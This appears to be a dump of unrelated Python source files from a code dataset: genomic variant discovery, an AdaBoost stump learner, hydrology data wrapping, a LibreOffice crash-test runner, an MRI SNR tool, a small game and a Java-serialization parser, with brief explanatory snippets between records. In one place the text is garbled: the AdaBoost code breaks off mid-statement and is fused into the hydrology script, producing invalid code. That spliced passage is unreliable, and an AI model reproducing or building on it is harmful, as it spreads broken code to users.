vcf\n\tsubprocess.Popen(['rm', 'unified_fr.vcf'])\n\t#delete unified frequency retrieved vcf\n\tsubprocess.Popen(['rm', 'unified_fr2.vcf'])\n\t#delete filtered vcf file\n\tsubprocess.Popen(['rm', 'filtered.vcf'])\n\t#delete filtered frequency vcf file\n\tsubprocess.Popen(['rm', 'filtered_fr.vcf'])\n\n#function to find maximum read length\ndef find_max_read_length():\n\tmax_read_length = subprocess.Popen(['awk', '{if(NR%4==2) {} max_read_length = (max_read_length > length) ? max_read_length : length} END {print max_read_length}', fwd_reads_file], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\tmax_read_length = max_read_length.stdout.readlines()\n\tmax_read_length_fwd = int(max_read_length[0]) #maximum read length in forward read file\n\tmax_read_length = subprocess.Popen(['awk', '{if(NR%4==2) {} max_read_length = (max_read_length > length) ? 
max_read_length : length} END {print max_read_length}', rvs_reads_file], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\tmax_read_length = max_read_length.stdout.readlines()\n\tmax_read_length_rvs = int(max_read_length[0]) #maximum read length in reverse read file\n\tmax_read_length = max(max_read_length_fwd, max_read_length_rvs) #greater of forward and reverse reads\n\treturn max_read_length\n\t\t\t\t\t\n#main function\ndef main(first_coordinate, last_coordinate):\n\tmax_read_len = find_max_read_length()\t\t#function to find maximum read length\n\trDNA_unit_size = last_coordinate - first_coordinate + 1 #size of rDNA unit\n\tlast_coordinate += max_read_len - 1\t#last coordinate of trimmed fasta file\n\tfirst_coordinate -= max_read_len - 1\t#first coordinate of trimmed fasta file\n\tvariant_discoverer(first_coordinate, last_coordinate, max_read_len, rDNA_unit_size)\t#fuction to discover the variants\n\tdelete_all_interim_files()\t#function to delete all intermediate files\n\nclass take_command_line_args():\n\tdef __init__(self, args, args_len):\n\t\tglobal ref_file, first_coordinate, last_coordinate, fwd_reads_file, rvs_reads_file, sub_sample, out_vcf\n\t\tref = False\n\t\tfirst = False\n\t\tlast = False\n\t\tfwd = False\n\t\trvs = False\n\t\tout = False\n\t\tsub = False\n\t\tref_file = ''\n\t\tfwd_reads_file = ''\n\t\trvs_reads_file = ''\n\t\tsub_sample = '1.0'\t\t\t#default value\n\t\tfor i in range(0, args_len-1, 2):\n\t\t\tif args[i] == '--reference' or args[i] == '-f':\n\t\t\t\tref_file = args[i+1]\t\t\t#reference file\n\t\t\t\tref = True\n\t\t\telif args[i] == '--unit_start' or args[i] == '-u':\n\t\t\t\tif args[i+1].isdigit():\n\t\t\t\t\tfirst_coordinate = int(args[i+1]) #first coordinate of rDNA unit\n\t\t\t\t\tfirst = True\n\t\t\t\telse:\n\t\t\t\t\tprint('Error16: First coordinate must be numeric')\n\t\t\t\t\tsys.exit(2)\n\t\t\telif args[i] == '--unit_end' or args[i] == '-v':\n\t\t\t\tif args[i+1].isdigit():\n\t\t\t\t\tlast_coordinate = int(args[i+1]) #last coordinate of rDNA unit\n\t\t\t\t\tlast = True\n\t\t\t\telse:\n\t\t\t\t\tprint('Error17: Last coordinate must be numeric')\n\t\t\t\t\tsys.exit(2)\n\t\t\telif args[i] == '--reads1' or args[i] == '-r':\n\t\t\t\tfwd_reads_file = args[i+1] #forward reads file\n\t\t\t\tfwd = True\n\t\t\telif args[i] == '--reads2' or args[i] == '-q':\n\t\t\t\trvs_reads_file = args[i+1] #reverse reads file\n\t\t\t\trvs = True\n\t\t\telif args[i] == '--sub_sample' or args[i] == '-s':\n\t\t\t\tsub_sample = args[i+1]\t\t#ratio of sampled reads in the bam file\n\t\t\t\tsub = True\n\t\t\telif args[i] == '--out' or args[i] == '-o':\n\t\t\t\tout_vcf = args[i+1] #output vcf file\n\t\t\t\tout = True\n\t\t\telse:\n\t\t\t\tprint('Error0: option {0} is not recognised'.format(args[i]))\n\t\t\t\tsys.exit(2)\n\t\t#error ans warning list\n\t\tif not ref:\n\t\t\tprint('Error1: Reference file name is missing')\n\t\tif not first:\n\t\t\tprint('Error2: First coordinate of rDNA unit is missing')\n\t\tif not last:\n\t\t\tprint('Error3: Last coordinate of rDNA unit is missing')\n\t\tif not fwd:\n\t\t\tprint('Error4: Forward read file name is missing')\n\t\tif not rvs:\n\t\t\tprint('Error5: Reverse read file name is missing')\n\t\tif not out:\n\t\t\tprint('Error6: Output file name is missing')\n\t\tif ref and not path.exists(ref_file):\n\t\t\tprint('Error7: Cannot find reference file')\n\t\tif fwd and not path.exists(fwd_reads_file):\n\t\t\tprint('Error8: Cannot find read1 file')\n\t\tif rvs and not path.exists(rvs_reads_file):\n\t\t\tprint('Error9: Cannot find read2 
file')\n\t\tif not ref or not first or not last or not fwd or not rvs or not out or not path.exists(ref_file) or not path.exists(fwd_reads_file) or not path.exists(rvs_reads_file):\n\t\t\tsys.exit(2)\n\t\tif sub and float(sub_sample) >= 1.0 or float(sub_sample) <= 0.0:\t\t\t#sampling ratio should always be less than 1\n\t\t\tprint('warning: Sub_sample ratio must be greater than 0 and less than 1. By default reads will not be sampled.')\n\t\t\tsub_sample = 1.0\n\tdef execute(self):\n\t\tmain(first_coordinate, last_coordinate)\t\t#adding two arguments because these are not acting as global variables for unknown reasons\n\nif __name__ == \"__main__\":\n\tpython = 'python'+str(sys.version_info.major) #python version\n\tfull_cmd_arguments = sys.argv\t# Get full command-line arguments\n\targument_list = full_cmd_arguments[1:]\t# Keep all but the first (because first is the function name)\n\tshort_options = \"f:u:v:r:q:s:o:\"\n\tlong_options = [\"reference=\", \"unit_start=\", \"unit_end=\", \"reads1=\", \"reads2=\", \"sub_sample=\", \"out=\"]\n\ttry:\n\t\targuments, values = getopt.getopt(argument_list, short_options, long_options)\n\texcept getopt.error as err:\n\t\t# Output error, and return with an error code\n\t\tprint (str(err))\n\t\tsys.exit(2)\n\targs_len = len(sys.argv)\n\targs = []\n\tfor i in range(1, args_len):\n\t\targs.append(sys.argv[i])\n\ttake_command_line_args(args, args_len).execute()\n","sub_path":"variant_discovery.py","file_name":"variant_discovery.py","file_ext":"py","file_size_in_byte":13308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
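variant_discovery.py wires external tools together by feeding one Popen's stdout into the next's stdin. The core idiom in isolation (the commands here are placeholders):

import subprocess

# Equivalent of the shell pipeline `sort words.txt | uniq -c`.
p1 = subprocess.Popen(['sort', 'words.txt'], stdout=subprocess.PIPE)
p2 = subprocess.Popen(['uniq', '-c'], stdin=p1.stdout, stdout=subprocess.PIPE)
p1.stdout.close()            # allow p1 to receive SIGPIPE if p2 exits first
out, _ = p2.communicate()
print(out.decode())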
+{"seq_id":"86354223","text":"# -*- coding: utf-8 -*-\n__author__ = \"shenfeng\"\nfrom numpy import *\nfrom matplotlib import pyplot as plt\ndef loadSimpData():\n datMat = matrix([[ 1. , 2.1],\n [ 2. , 1.1],\n [ 1.3, 1. ],\n [ 1. , 1. ],\n [ 2. , 1. ]])\n classLabels = [1.0, 1.0, -1.0, -1.0, 1.0]\n return datMat,classLabels\n\n#通过阈值比较进行分类,\ndef stumpClassify(datamatrix,dimen,threshVal,threshIneq):\n #参数:训练数据集矩阵,第几个特征,阈值,大于、小于符号\n retAraay=ones((shape(datamatrix)[0],1))\n if threshIneq=='lt':\n retAraay[datamatrix[:,dimen]<=threshVal]=-1\n else:\n retAraay[datamatrix[:,dimen]>threshVal]=-1\n return retAraay\n\n#找到最佳单层决策树\ndef buildStump(dataarr,lebals,D):\n #参数:训练数据集矩阵,类别标签,样本权重\n dataMat=mat(dataarr)\n\n lebalMat=mat(lebals).transpose()\n numsteps=10.0\n beststump={}\n m,n=shape(dataMat)\n bestclassset=mat(zeros((m,1)))\n minerr=inf\n for i in range(n): #对于每个向量循环\n Min=dataMat[:,i].min()\n Max=dataMat[:,i].max()\n stepsize=(Max-Min)/numsteps\n for j in range(-1,int(numsteps)+1):\n\n for Ineq in ['lt','gt']:\n threshVal=Min+float(j)*stepsize\n predictVals=stumpClassify(dataMat,i,threshVal,Ineq)\n error=mat(ones((m,1)))\n error[predictVals==lebalMat]=0\n errorWeight=D.T*error\n #print('dim : %d, thresh %.2f, threshIneq :%s , errweiget :%.3f' % (i, threshVal, Ineq, errorWeight))\n if errorWeight=0 and key ed):\n continue\n for lst, var in zip([fLst, qLst], [varF, varQ]):\n temp = pd.DataFrame({'date': ctR}).set_index(\n 'date').join(df[var])\n # temp = temp.interpolate(\n # limit=nFill, limit_direction='both', limit_area='inside')\n # give up interpolation after many thoughts\n lst.append(temp.values)\n if optC == 'end':\n cLst.append(dfC.iloc[k].values)\n elif optC == 'seq':\n tempC = pd.DataFrame({'date': ctR}).set_index(\n 'date').join(df[varC])\n cLst.append(tempC.values)\n gLst.append(tabG.loc[siteNo].values)\n infoLst.append(dict(siteNo=siteNo, date=ct))\n t2 = time.time()\n print('{} on site {} reading {:.3f} total {:.3f}'.format(\n i, siteNo, t2-t1, t2-t0))\n\n f = np.stack(fLst, axis=-1).swapaxes(1, 2).astype(np.float32)\n q = np.stack(qLst, axis=-1).swapaxes(1, 2).astype(np.float32)\n g = np.stack(gLst, axis=-1).swapaxes(0, 1).astype(np.float32)\n if optC == 'end':\n c = np.stack(cLst, axis=-1).swapaxes(0, 1).astype(np.float32)\n elif optC == 'seq':\n c = np.stack(cLst, axis=-1).swapaxes(1, 2).astype(np.float32)\n\n # save\n infoDf = pd.DataFrame(infoLst)\n saveFolder = os.path.join(kPath.dirWQ, 'trainData')\n saveName = os.path.join(saveFolder, caseName)\n np.savez(saveName, q=q, f=f, c=c, g=g)\n infoDf.to_csv(saveName+'.csv')\n dictData = dict(name=caseName, rho=rho,\n varG=varG, varC=varC, varQ=['00060'],\n varF=varF, siteNoLst=siteNoLst)\n with open(saveName+'.json', 'w') as fp:\n json.dump(dictData, fp, indent=4)\n","sub_path":"hydroDL/app/waterQuality/wqWrapData.py","file_name":"wqWrapData.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"257918570","text":"#!/usr/bin/env python\n\n# Libreoffice test-bugzilla-files control script\n# Copyright (C) 2014 Markus Mohrhard\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\nimport os\nimport os.path\nimport concurrent.futures\nimport time\nimport subprocess\nimport getopt\nimport sys\nfrom shutil import copyfile, rmtree, disk_usage\n\ndef partition(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]\n\ndef get_tasks(directory, files_per_task):\n flist = [os.path.join(dirpath, f) for dirpath, dirnames, fnames in os.walk(directory) for f in fnames]\n\n partitioned_list = list(partition(flist, files_per_task))\n task_files = []\n i = 0\n for list_item in partitioned_list:\n filename = \"task\" + str(i)\n task_file = open(filename, \"w\")\n for item in list_item:\n task_file.write(\"%s\\n\" % item)\n task_files.append(os.path.join(os.getcwd(),filename))\n i += 1\n print(\"number of tasks: \" + str(len(task_files)))\n return task_files\n\ndef execute_task(task_file, asan):\n print(asan)\n if asan == 1:\n subprocess.call(\"./execute_asan.sh \" + task_file + \" --asan\", shell=True)\n elif asan == 0:\n subprocess.call(\"./execute.sh \" + task_file, shell=True)\n time.sleep(1)\n os.remove(task_file)\n\ndef saveAsPreviousState(exported_files):\n odf_file_ext = ['odt', 'odp', 'odb', 'ods', 'odg']\n previous_path = os.environ[\"CRASHTESTDATA\"] + \"/previous\"\n if os.path.exists(previous_path):\n rmtree(previous_path)\n\n for ext in odf_file_ext:\n os.makedirs(previous_path + os.environ[\"CRASHTESTDATA\"] + \"/files/\"+ ext)\n\n prefix = os.environ[\"CRASHTESTDATA\"] + \"/current\"\n for file in exported_files:\n ext = file[-3:]\n if ext in odf_file_ext and os.path.exists(file):\n os.makedirs(os.path.dirname(os.environ[\"CRASHTESTDATA\"] + \"/previous\"+file[len(prefix):]), exist_ok=True)\n copyfile(file, os.environ[\"CRASHTESTDATA\"] + \"/previous\"+file[len(prefix):])\n\n SHAcmd = \"cd $SRCDIR && git rev-parse HEAD\"\n previous_SHA = str(subprocess.check_output(SHAcmd, shell=True), encoding='utf-8')\n previous_SHA_file = open(os.environ[\"CRASHTESTDATA\"] + \"/previous/hash.txt\", \"w\")\n previous_SHA_file.write(previous_SHA)\n previous_SHA_file.close()\n\ndef get_list_of_files(directory_name):\n list_of_file = os.listdir(directory_name)\n all_files = list()\n for filename in list_of_file:\n full_path = os.path.join(directory_name, filename)\n if os.path.isdir(full_path):\n all_files = all_files + get_list_of_files(full_path)\n else:\n all_files.append(full_path)\n return all_files\n\ndef checkDiskSpace():\n total, used, free = disk_usage(os.environ[\"CRASHTESTDATA\"])\n freeGiB = free // (2**30)\n disk_space_limit = int(os.environ[\"DISKSPACELIMIT\"])\n if freeGiB <= disk_space_limit:\n diskusagefile = open(os.environ[\"CRASHTESTDATA\"] + \"/diskusageinfo.txt\", \"w\")\n diskusagefile.write(str(freeGiB))\n diskusagefile.close()\n\ndef checkCPULoadAverage():\n cpuload, _, _ = os.getloadavg()\n cpuload /= 
float(os.cpu_count())\n cpu_loadavg_limit = float(os.environ[\"CPULOADAVGLIMIT\"])\n\n if cpuload > cpu_loadavg_limit:\n cpuusagefile = open(os.environ[\"CRASHTESTDATA\"] + \"/cpuusageinfo.txt\", \"w\")\n cpuusagefile.write(str(cpuload))\n cpuusagefile.close()\n\ndef checkMemoryUsage():\n memory_info = dict((i.split()[0].rstrip(':'),int(i.split()[1])) for i in open('/proc/meminfo').readlines())\n total_memory = memory_info['MemTotal']\n # Not Total - Free, as that would include caches as well, which is not interesting for us.\n used_memory = total_memory - memory_info['MemAvailable']\n\n usage = used_memory / total_memory\n usage_in_percent = round(round(usage, 2)*100)\n memory_limit = int(os.environ[\"MEMORYLIMIT\"])\n\n if usage_in_percent > memory_limit:\n memoryusagefile = open(os.environ[\"CRASHTESTDATA\"]+\"/memoryusageinfo.txt\", \"w\")\n memoryusagefile.write(str(usage_in_percent)+'%')\n memoryusagefile.close()\n\ndef usage():\n message = \"\"\"usage: {program} [option] dir\n - h | --help: print usage information\n \n 'dir' is the path to the directory with the test files\"\"\"\n print(message.format(program = os.path.basename(sys.argv[0])))\n\nif __name__ == \"__main__\":\n opts, args = getopt.getopt(sys.argv[1:], \"hd:a\", [\"help\", \"directory=\", \"asan\"])\n # getopt returns (flag, value) pairs, so compare against the flag names only\n flags = [opt for opt, _ in opts]\n if \"-h\" in flags or \"--help\" in flags:\n usage()\n sys.exit()\n\n asan = 0\n if \"-a\" in flags or \"--asan\" in flags:\n asan = 1\n\n if len(args) == 0:\n usage()\n sys.exit(1)\n\n directory = args[0]\n\n print(directory)\n if not os.path.isdir(directory):\n print(\"no valid directory\")\n sys.exit(1)\n\n task_size = int(os.environ[\"FILESNR\"])\n workers = int(os.environ[\"WORKERS\"])\n if asan == 1:\n workers = 64\n\n checkCPULoadAverage()\n checkDiskSpace()\n checkMemoryUsage()\n with concurrent.futures.ThreadPoolExecutor(max_workers=workers) as executor:\n future_to_task = {executor.submit(execute_task, task_file, asan): task_file for task_file in get_tasks(directory, task_size)}\n for future in concurrent.futures.as_completed(future_to_task):\n task = future_to_task[future]\n try:\n future.result()\n except Exception as exc:\n print('%r generated an exception: %s' % (task, exc))\n else:\n print('%r successfully passed' % (task))\n\n exported_files = get_list_of_files(os.environ[\"CRASHTESTDATA\"] + \"/current/\" + os.environ[\"CRASHTESTDATA\"] + \"/files/\")\n checkDiskSpace()\n\n if os.getenv('SAVEPREVIOUSSTATE'):\n saveAsPreviousState(exported_files)\n checkDiskSpace()\n","sub_path":"test-bugzilla-files/new-control.py","file_name":"new-control.py","file_ext":"py","file_size_in_byte":6401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
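The control script above fans fixed-size task files out over a thread pool and collects results with as_completed. The pattern reduced to its essentials:

import concurrent.futures

def partition(lst, n):
    for i in range(0, len(lst), n):
        yield lst[i:i+n]

def handle(chunk):           # stand-in for execute_task
    return sum(chunk)

with concurrent.futures.ThreadPoolExecutor(max_workers=4) as executor:
    futures = {executor.submit(handle, c): c for c in partition(list(range(10)), 3)}
    for fut in concurrent.futures.as_completed(futures):
        print(futures[fut], '->', fut.result())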
+{"seq_id":"308692771","text":"#!/usr/bin/env python\n#########################################################################################\n#\n# Compute SNR in a given ROI according to different methods presented in Dietrich et al.,\n# Measurement of signal-to-noise ratios in MR images: Influence of multichannel coils,\n# parallel imaging, and reconstruction filters (2007).\n#\n# ---------------------------------------------------------------------------------------\n# Copyright (c) 2015 Polytechnique Montreal \n# Authors: Simon LEVY\n#\n# About the license: see the file LICENSE.TXT\n#########################################################################################\n\nimport sys\nimport numpy as np\nfrom msct_parser import Parser\nfrom msct_image import Image\nfrom sct_image import get_orientation_3d, set_orientation\nimport sct_utils as sct\nfrom os import rmdir, chdir\n\n\n# PARSER\n# ==========================================================================================\ndef get_parser():\n\n # Initialize the parser\n parser = Parser(__file__)\n parser.usage.set_description('Compute SNR in a given ROI according to different methods presented in Dietrich et al., Measurement of signal-to-noise ratios in MR images: Influence of multichannel coils, parallel imaging, and reconstruction filters (2007).')\n parser.add_option(name=\"-i\",\n type_value='image_nifti',\n description=\"Input images to compute the SNR on. Must be concatenated in time. Typically, 2 or 3 b0s concatenated in time (depending on the method used).\",\n mandatory=True,\n example=\"b0s.nii.gz\")\n parser.add_option(name=\"-m\",\n type_value='image_nifti',\n description='ROI within which SNR will be averaged.',\n mandatory=True,\n example='dwi_moco_mean_seg.nii.gz')\n parser.add_option(name=\"-method\",\n type_value='multiple_choice',\n description='Method to use to compute the SNR:\\n- diff: Use the two first volumes to estimate noise variance.\\n- mult: Use all volumes to estimate noise variance.',\n mandatory=False,\n default_value='diff',\n example=['diff', 'mult', 'background', 'nema'])\n parser.add_option(name=\"-vertfile\",\n type_value='image_nifti',\n description='File name of the vertebral labeling registered to the input images.',\n mandatory=False,\n default_value='label/template/MNI-Poly-AMU_level.nii.gz')\n parser.add_option(name=\"-vert\",\n type_value='str',\n description='Vertebral levels where to compute the SNR.',\n mandatory=False,\n example='2:6',\n default_value='None')\n parser.add_option(name=\"-z\",\n type_value='str',\n description='Slices where to compute the SNR.',\n mandatory=False,\n example='2:6',\n default_value='None')\n parser.add_option(name=\"-v\",\n type_value=\"multiple_choice\",\n description=\"\"\"Verbose. 0: nothing. 
1: basic.\"\"\",\n mandatory=False,\n default_value='0',\n example=['0', '1'])\n return parser\n\n\n# MAIN\n# ==========================================================================================\ndef main():\n\n # initialization\n fname_mask = ''\n\n # Get parser info\n parser = get_parser()\n arguments = parser.parse(sys.argv[1:])\n fname_data = arguments['-i']\n fname_mask = arguments['-m']\n vert_label_fname = arguments[\"-vertfile\"]\n vert_levels = arguments[\"-vert\"]\n slices_of_interest = arguments[\"-z\"]\n method = arguments[\"-method\"]\n verbose = int(arguments['-v'])\n\n\n # Check if data are in RPI\n input_im = Image(fname_data)\n input_orient = get_orientation_3d(input_im)\n\n # If orientation is not RPI, change to RPI\n if input_orient != 'RPI':\n sct.printv('\\nCreate temporary folder to change the orientation of the NIFTI files into RPI...', verbose)\n path_tmp = sct.tmp_create()\n # change orientation and load data\n sct.printv('\\nChange input image orientation and load it...', verbose)\n input_im_rpi = set_orientation(input_im, 'RPI', fname_out=path_tmp+'input_RPI.nii')\n input_data = input_im_rpi.data\n # Do the same for the mask\n sct.printv('\\nChange mask orientation and load it...', verbose)\n mask_im_rpi = set_orientation(Image(fname_mask), 'RPI', fname_out=path_tmp+'mask_RPI.nii')\n mask_data = mask_im_rpi.data\n # Do the same for vertebral labeling if present\n if vert_levels != 'None':\n sct.printv('\\nChange vertebral labeling file orientation and load it...', verbose)\n vert_label_im_rpi = set_orientation(Image(vert_label_fname), 'RPI', fname_out=path_tmp+'vert_labeling_RPI.nii')\n vert_labeling_data = vert_label_im_rpi.data\n # Remove the temporary folder used to change the NIFTI files orientation into RPI\n sct.printv('\\nRemove the temporary folder...', verbose)\n rmdir(path_tmp)\n else:\n # Load data\n sct.printv('\\nLoad data...', verbose)\n input_data = input_im.data\n mask_data = Image(fname_mask).data\n if vert_levels != 'None':\n vert_labeling_data = Image(vert_label_fname).data\n sct.printv('\\tDone.', verbose)\n\n # Get slices corresponding to vertebral levels\n if vert_levels != 'None':\n from sct_extract_metric import get_slices_matching_with_vertebral_levels\n slices_of_interest, actual_vert_levels, warning_vert_levels = get_slices_matching_with_vertebral_levels(mask_data, vert_levels, vert_labeling_data, verbose)\n\n # Remove slices that were not selected\n if slices_of_interest == 'None':\n slices_of_interest = '0:'+str(mask_data.shape[2]-1)\n slices_boundary = slices_of_interest.split(':')\n slices_of_interest_list = range(int(slices_boundary[0]), int(slices_boundary[1])+1)\n # Crop\n input_data = input_data[:, :, slices_of_interest_list, :]\n mask_data = mask_data[:, :, slices_of_interest_list]\n\n # Get signal and noise\n indexes_roi = np.where(mask_data == 1)\n if method == 'mult':\n signal = np.mean(input_data[indexes_roi])\n std_input_temporal = np.std(input_data, 3)\n noise = np.mean(std_input_temporal[indexes_roi])\n elif method == 'diff':\n data_1 = input_data[:, :, :, 0]\n data_2 = input_data[:, :, :, 1]\n signal = np.mean(np.add(data_1[indexes_roi], data_2[indexes_roi]))\n noise = np.sqrt(2)*np.std(np.subtract(data_1[indexes_roi], data_2[indexes_roi]))\n elif method == 'background':\n sct.printv('ERROR: Sorry, method is not implemented yet.', 1, 'error')\n elif method == 'nema':\n sct.printv('ERROR: Sorry, method is not implemented yet.', 1, 'error')\n\n # compute SNR\n SNR = signal/noise\n\n # Display result\n 
sct.printv('\\nSNR_'+method+' = '+str(SNR)+'\\n', type='info')\n\n\n\n# START PROGRAM\n# ==========================================================================================\nif __name__ == \"__main__\":\n # call main function\n main()\n","sub_path":"scripts/sct_compute_snr.py","file_name":"sct_compute_snr.py","file_ext":"py","file_size_in_byte":7432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
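For reference, the 'diff' estimator implemented above is SNR = mean(S1 + S2) / (sqrt(2) * std(S1 - S2)) over the ROI (Dietrich et al., 2007): summing two repeats doubles the signal, while differencing cancels it and leaves pure noise. A synthetic check in numpy:

import numpy as np

rng = np.random.default_rng(0)
roi_1 = 100 + rng.normal(0, 5, size=10000)   # two repeats: signal 100, noise sigma 5
roi_2 = 100 + rng.normal(0, 5, size=10000)
snr = np.mean(roi_1 + roi_2) / (np.sqrt(2) * np.std(roi_1 - roi_2))
print(snr)  # ~ 200 / (sqrt(2) * sqrt(2) * 5) = 20, i.e. signal/sigma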
+{"seq_id":"464271549","text":"class Gracz(object):\r\n \r\n def __init__(self):\r\n \r\n # x and y - position\r\n self.zycie = 3\r\n self.x = 335\r\n self.y = 450\r\n self.left = 0\r\n self.right = 0\r\n self.speed = 15\r\n \r\n \r\n def show(self): # draw the player\r\n fill(241, 196, 15)\r\n circle(self.x, self.y, 55)\r\n \r\n def update(self): # update the player position + clamp at the screen edges\r\n self.x = self.x + (self.right - self.left) * self.speed\r\n \r\n if not (self.x <= (700 - 35)):\r\n self.x = (700 - 35) \r\n \r\n if not (self.x >= 35):\r\n self.x = 35\r\n \r\n \r\n #def strac_zycie(self,zycie):\r\n #self.zycie -= 1\r\n \r\n #if self.zycie == 0:\r\n #print(\"Game over!\")\r\n \r\n \r\nclass Bullet(object):\r\n \r\n def __init__(self):\r\n self.pl_x = 335\r\n self.y = 450\r\n self.speed = 20\r\n self.up = 0\r\n self.right = 0\r\n self.left = 0\r\n self.player_speed = 15\r\n \r\n \r\n def show_bullet(self):\r\n fill(255)\r\n rect(self.pl_x-2, self.y-27, 3, 12)\r\n \r\n def update_bullet(self):\r\n self.pl_x = self.pl_x + (self.right - self.left) * self.player_speed\r\n \r\n \r\n def shot(self):\r\n self.y = self.y - self.up * self.speed\r\n \r\n \r\n \r\n \r\n\r\ndef setup():\r\n size(700, 500)\r\n \r\n global statek\r\n global pocisk\r\n statek = Gracz()\r\n pocisk = Bullet() # create the bullet up front so draw() can reference it\r\n \r\n \r\ndef draw():\r\n background(74, 35, 90)\r\n global statek\r\n global pocisk\r\n statek.show()\r\n statek.update()\r\n \r\n pocisk.update_bullet()\r\n \r\n print(mouseX, mouseY)\r\n \r\ndef keyPressed():\r\n global pocisk # rebinding pocisk below would otherwise make it a local name\r\n if keyCode == LEFT:\r\n statek.left = 1\r\n pocisk.left = 1\r\n\r\n \r\n if keyCode == RIGHT:\r\n statek.right = 1\r\n pocisk.right = 1\r\n\r\n \r\n if keyCode == 32:\r\n pocisk = Bullet()\r\n pocisk.up = 1\r\n pocisk.show_bullet()\r\n pocisk.shot()\r\n \r\ndef keyReleased():\r\n if keyCode == LEFT:\r\n statek.left = 0\r\n pocisk.left = 0\r\n \r\n if keyCode == RIGHT:\r\n statek.right = 0\r\n pocisk.right = 0\r\n \r\n if keyCode == 32:\r\n pocisk.up = 0\r\n \r\n\r\n\r\n\r\n \r\n\r\n \r\n","sub_path":"space_invaders.pyde","file_name":"space_invaders.pyde","file_ext":"pyde","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"301508558","text":"from struct import pack, unpack\n\nfrom Constants import Constants\nfrom Exceptions import InvalidHeaderException, InvalidTypeCodeException\nfrom JavaMetaClass import *\n\n\nclass ObjectIO:\n def __init__(self, base_stream):\n self.base_stream = base_stream\n\n def readByte(self) -> bytes:\n return self.base_stream.read(1)\n\n def peekByte(self) -> bytes:\n return self.base_stream.peek()[:1]\n\n def readUnsignedShort(self) -> int:\n number = self.readBytes(2)\n number = int.from_bytes(number, 'big')\n return number & 0xFFFF\n\n def readUnsignedLong(self) -> int:\n number = self.readBytes(8)\n return int.from_bytes(number, 'big') & 0xFFFFFFFFFFFFFFFF\n\n # Java primitives are big-endian and signed\n def readLong(self) -> int:\n number = self.readBytes(8)\n return int.from_bytes(number, 'big', signed=True)\n\n def readShort(self) -> int:\n number = self.readBytes(2)\n return int.from_bytes(number, 'big', signed=True)\n\n def readInt(self) -> int:\n return int.from_bytes(self.readBytes(4), 'big', signed=True)\n\n def writeInt(self, num):\n self.writeBytes(num.to_bytes(4, 'big'))\n\n def readBytes(self, length) -> bytes:\n return self.base_stream.read(length)\n\n def readString(self) -> str:\n length = self.readUnsignedShort()\n return self.readBytes(length).decode()\n\n def readFloat(self):\n num = self.readBytes(4)\n return unpack('>f', num)[0]\n\n def readBoolean(self):\n # a Java boolean is one byte: 0x00 = false, anything else = true\n tc = int.from_bytes(self.readByte(), 'big')\n return tc != 0\n\n def readChar(self):\n # a Java char is a UTF-16 code unit (2 bytes, big-endian)\n tc = self.readBytes(2)\n return tc.decode('utf-16-be')\n\n def readDouble(self):\n tc = self.readBytes(8)\n return unpack('>d', tc)[0]\n\n def writeBytes(self, value):\n self.base_stream.write(value)\n\n def writeString(self, value):\n length = len(value)\n self.writeShort(length)\n self.writeBytes(value.encode())\n\n def pack(self, fmt, data):\n return self.writeBytes(pack(fmt, data))\n\n def unpack(self, fmt, length=1):\n return unpack(fmt, self.readBytes(length))[0]\n\n def writeShort(self, num):\n self.writeBytes(num.to_bytes(2, \"big\"))\n\n def writeLong(self, num):\n self.writeBytes(num.to_bytes(8, \"big\"))\n\n def writeFloat(self, value):\n self.writeBytes(pack('>f', value))\n\n def writeChar(self, value):\n self.writeBytes(value.encode('utf-16-be'))\n\n def writeDouble(self, value):\n self.writeBytes(pack('>d', value))\n\n def writeBoolean(self, value):\n value = 1 if value else 0\n self.writeBytes(value.to_bytes(1, 'big'))\n\n\nclass ObjectStream:\n def __init__(self, stream):\n self.bin = ObjectIO(stream)\n self.handles = []\n self.readStreamHeader()\n\n def newHandles(self, __object__):\n self.handles.append(__object__)\n return len(self.handles) - 1 + Constants.baseWireHandle\n\n def readStreamHeader(self):\n magic = self.bin.readUnsignedShort()\n version = self.bin.readUnsignedShort()\n if magic != Constants.magic or version != Constants.version:\n raise InvalidHeaderException(magic, version)\n\n def readClassDescriptor(self):\n \"\"\"\n Read the descriptor of a non-proxy class; the parsed classDesc is added to the handle table.\n :return:\n \"\"\"\n tc = self.bin.peekByte()\n if tc == Constants.TC_CLASSDESC:\n javaClass = self.__readClassDesc__()\n elif tc == Constants.TC_REFERENCE:\n javaClass = self.readHandle()\n else:\n raise InvalidTypeCodeException(tc)\n return javaClass\n\n def readProxyClassDescriptor(self):\n \"\"\"\n Read the descriptor of a dynamic proxy class.\n # TODO: this may be buggy, needs further checking\n :return:\n \"\"\"\n tc = self.bin.readByte()\n if tc != Constants.TC_PROXYCLASSDESC:\n raise InvalidTypeCodeException(tc)\n interfaceCount = self.bin.readInt()\n print(f\"Interface count {interfaceCount}\")\n interfaces = []\n for i in range(interfaceCount):\n interfaceName = self.bin.readString()\n interfaces.append(interfaceName)\n print(\"--------------\")\n print(interfaceName)\n javaProxyClass = JavaProxyClass(interfaces)\n handle = self.newHandles(javaProxyClass)\n print(f\"TC_PROXYCLASSDESC new handle from {hex(handle)}\")\n self.readClassAnnotations(javaProxyClass)\n javaProxyClass.superJavaClass = self.readSuperClassDesc()\n return javaProxyClass\n\n def __readClassDesc__(self):\n tc = self.bin.readByte()\n if tc != Constants.TC_CLASSDESC:\n raise InvalidTypeCodeException(tc)\n # read Class name from bin\n className = self.bin.readString()\n suid = self.bin.readUnsignedLong()\n flags = self.bin.readByte()\n flags = int.from_bytes(flags, 'big')\n numFields = self.bin.readUnsignedShort()\n externalizable = flags & 